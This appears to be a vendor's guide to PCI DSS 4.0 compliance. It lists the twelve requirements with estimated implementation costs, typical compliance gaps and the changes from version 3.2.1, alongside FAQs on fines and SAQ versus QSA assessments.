How much does PCI DSS compliance cost?

PCI DSS compliance costs vary significantly by merchant level. Level 4 small merchants typically spend $1,000–$5,000/year for a SAQ and basic scanning. Level 3 merchants spend $5,000–$20,000. Level 2 merchants spend $10,000–$50,000. Level 1 merchants requiring a full QSA assessment can spend $50,000–$500,000+ per year.

What are the fines for PCI non-compliance?

Card brands (Visa, Mastercard) can fine acquiring banks $5,000–$100,000 per month for merchants that are non-compliant. These fines are typically passed on to the merchant. If a data breach occurs while non-compliant, the merchant can also be held liable for all fraudulent charges and investigation costs.

What is the difference between PCI SAQ and QSA assessment?

A Self-Assessment Questionnaire (SAQ) is a self-reported validation tool for smaller merchants. A Qualified Security Assessor (QSA) assessment is a formal audit conducted by a PCI-certified third party, required for Level 1 merchants (processing over 6 million transactions/year) and some Level 2 merchants.

PCI DSS 4.0 is the latest version of the Payment Card Industry Data Security Standard, released in March 2022. It includes 12 core requirements covering network security, cardholder data protection, vulnerability management, access control, monitoring, and information security policies. Version 3.2.1 was retired in March 2024.

PCI DSS 4.0 Requirements Overview

PCI DSS 4.0 has 12 requirements across 6 goals. Version 3.2.1 was retired in March 2024 — all merchants must now comply with PCI DSS 4.0. Here's what each requirement costs to implement and where organisations commonly fail.

Low effortMedium effortHigh effort / cost

Install and Maintain Network Security Controls

Medium

Firewalls and other network security controls must protect the cardholder data environment from untrusted networks.

What it means in practice

You need documented network diagrams, firewall rule sets reviewed at least every 6 months, and clear separation between your payment network and everything else.

Common gaps

No documented network diagram
Firewall rules never reviewed or cleaned up
No formal change management for network changes
CDE not properly segmented from corporate network

Implementation cost

$500–$50,000

Next-gen firewall + configuration review. Higher for large, segmented networks.

Apply Secure Configurations to All System Components

Low

Default vendor passwords and settings must be changed. All system components must be configured to industry standards.

What it means in practice

No default passwords. Disable all unnecessary services. Apply CIS Benchmarks or equivalent to every system in scope. Document it.

Common gaps

Default credentials still in use on networking equipment
Unnecessary services running (FTP, Telnet)
No configuration baseline documented

Implementation cost

$1,000–$20,000

Configuration management tooling + audit time. Ongoing for patch cycles.

Protect Stored Account Data

High

Sensitive card data must not be stored unless strictly necessary. What IS stored must be encrypted with strong cryptography.

What it means in practice

You must know exactly where card data lives. PAN (card number) stored at rest must be encrypted with AES-256. CVV, PIN, and magnetic stripe data must NEVER be stored.

Common gaps

Card data stored in unencrypted log files
Developers storing PANs in test databases
CVV data found in application logs
No key rotation process

Implementation cost

$5,000–$100,000

Tokenisation platforms, key management infrastructure, data discovery tools.

Protect Cardholder Data with Strong Cryptography During Transmission

Low

Card data transmitted over open, public networks must be encrypted using strong cryptography (TLS 1.2+).

What it means in practice

All payment data in transit must use TLS 1.2 or 1.3. No SSL, no TLS 1.0/1.1. This includes internal network transmissions if they cross untrusted segments.

Common gaps

Legacy TLS 1.0/1.1 still enabled
Self-signed certs without proper validation
Internal services using unencrypted HTTP
Certificate expiry not monitored

Implementation cost

$500–$10,000

Certificate management, TLS configuration audit. Usually low cost but requires ongoing renewal.

Protect All Systems and Networks from Malicious Software

Low

Antivirus and anti-malware must be deployed on all systems susceptible to malware. Must be kept current and actively running.

What it means in practice

Endpoint protection on all in-scope systems. Centralised management. Logs reviewed. PCI DSS 4.0 added explicit anti-phishing controls.

Common gaps

AV definitions not automatically updated
No centralised management console
Servers excluded from AV scanning
No phishing simulation or training programme

Implementation cost

$2,000–$30,000/year

Endpoint protection platform (EPP/EDR) licensing. Enterprise solutions add behaviour analytics.

Develop and Maintain Secure Systems and Software

High

All software must be developed securely. Vulnerabilities must be identified and patched. Web-facing applications must be protected from known attacks.

What it means in practice

Formal patch management with defined SLAs. For e-commerce: a WAF or file integrity monitor on all payment pages. PCI DSS 4.0 added payment page script security requirements.

Common gaps

No formal patch management SLAs
No WAF protecting checkout page
Third-party JavaScript on payment pages not inventoried
Developers not trained in secure coding (OWASP)

Implementation cost

$5,000–$80,000/year

WAF ($3k–$30k/year), DAST scanning, code review tools, patch management platform.

Restrict Access to System Components and Cardholder Data

Medium

Access to card data must be restricted to the minimum necessary (need to know). Role-based access controls must be documented.

What it means in practice

Least privilege. Document who has access to what and why. Review access quarterly. No shared accounts.

Common gaps

Shared/generic accounts used by multiple people
Access never revoked when staff leave
No formal access request/approval process
Database access not restricted to application service accounts

Implementation cost

$1,000–$15,000

Access control tooling, IAM platform, quarterly review process labour.

Identify Users and Authenticate Access to System Components

Medium

Every user must have a unique ID. MFA required for all access into the CDE and all remote access. Passwords must meet minimum requirements.

What it means in practice

MFA everywhere — this is non-negotiable in PCI DSS 4.0. Passwords minimum 12 characters. No shared accounts. All privileged access via MFA.

Common gaps

MFA not enforced for remote access
Shared admin accounts
Weak password policies still in place
Service accounts with passwords that never expire

Implementation cost

$2,000–$20,000/year

MFA solution (Duo, Okta, etc.) + password manager deployment + policy enforcement.

Restrict Physical Access to Cardholder Data

Low

Physical access to systems and media containing card data must be restricted and logged.

What it means in practice

Badged access to server rooms. Visitor logs. Media destruction policy. Point-of-sale terminal tamper checks. No card data on paper left unattended.

Common gaps

No visitor log for server room/data centre
POS terminals not inspected for tampering
Paper records with card data not securely destroyed
Media disposal not tracked

Implementation cost

$500–$10,000

Physical access controls, badge systems, video surveillance, media shredding services.

Log and Monitor All Access to System Components and Cardholder Data

High

Audit logs must capture all access to cardholder data. Logs must be reviewed daily and retained for 12 months (3 months immediately available).

What it means in practice

SIEM or centralised log management is effectively required at scale. Logs from all in-scope systems. Automated alerting on suspicious activity. Log integrity protection.

Common gaps

No centralised logging — logs siloed on individual servers
Logs not reviewed regularly (just stored)
Log retention below 12 months
No alerting on failed login attempts or privilege escalation

Implementation cost

$5,000–$100,000/year

SIEM platform (Splunk, Elastic, Sentinel) or managed security operations. This is often the largest ongoing cost.

Test Security of Systems and Networks Regularly

Medium

Regular vulnerability scans (quarterly external by ASV) and annual penetration tests are mandatory. Wireless scanning if applicable.

What it means in practice

External vulnerability scans every 90 days by an Approved Scanning Vendor (ASV). Annual penetration test by qualified internal or external tester. Immediate re-scan after significant changes.

Common gaps

Pen test done once but findings never remediated
Scans not re-run after significant system changes
No internal vulnerability scanning
Pen test scope excluded key systems to save money

Implementation cost

$3,000–$80,000/year

ASV scanning ($800–$5,000/year), penetration test ($5,000–$50,000/engagement). Segmentation pen tests add cost.

Support Information Security with Organisational Policies and Programmes

Medium

A formal, documented information security policy. Annual risk assessment. Incident response plan. Annual security training for all relevant staff.

What it means in practice

Written policies for everything. Annual review. Risk assessment documented. Incident response plan tested. All staff with access to card data trained at hire and annually.

Common gaps

Policies exist but were written once and never updated
No formal risk assessment process
Incident response plan never tested
Training done once at hire, never repeated

Implementation cost

$2,000–$30,000

Policy writing/review (consultancy or internal time), training platform, IR plan testing exercise.

New in PCI DSS 4.0

Key changes from v3.2.1 that affect compliance costs:

MFA now required for all access into the cardholder data environment — not just remote access
Payment page script security (Req 6.4.3): inventory and authorise all scripts on payment pages; detect and respond to unauthorised changes
Targeted risk analysis: merchants can now customise some controls if they can justify equivalent security via formal risk analysis
12-character minimum password length (up from 7) with complexity requirements
Anti-phishing controls added under Requirement 5
Penetration testing scope clarified: segmentation testing required when network segmentation is used to reduce scope

Calculate Your Total PCI Cost Free PCI Exposure Teardown →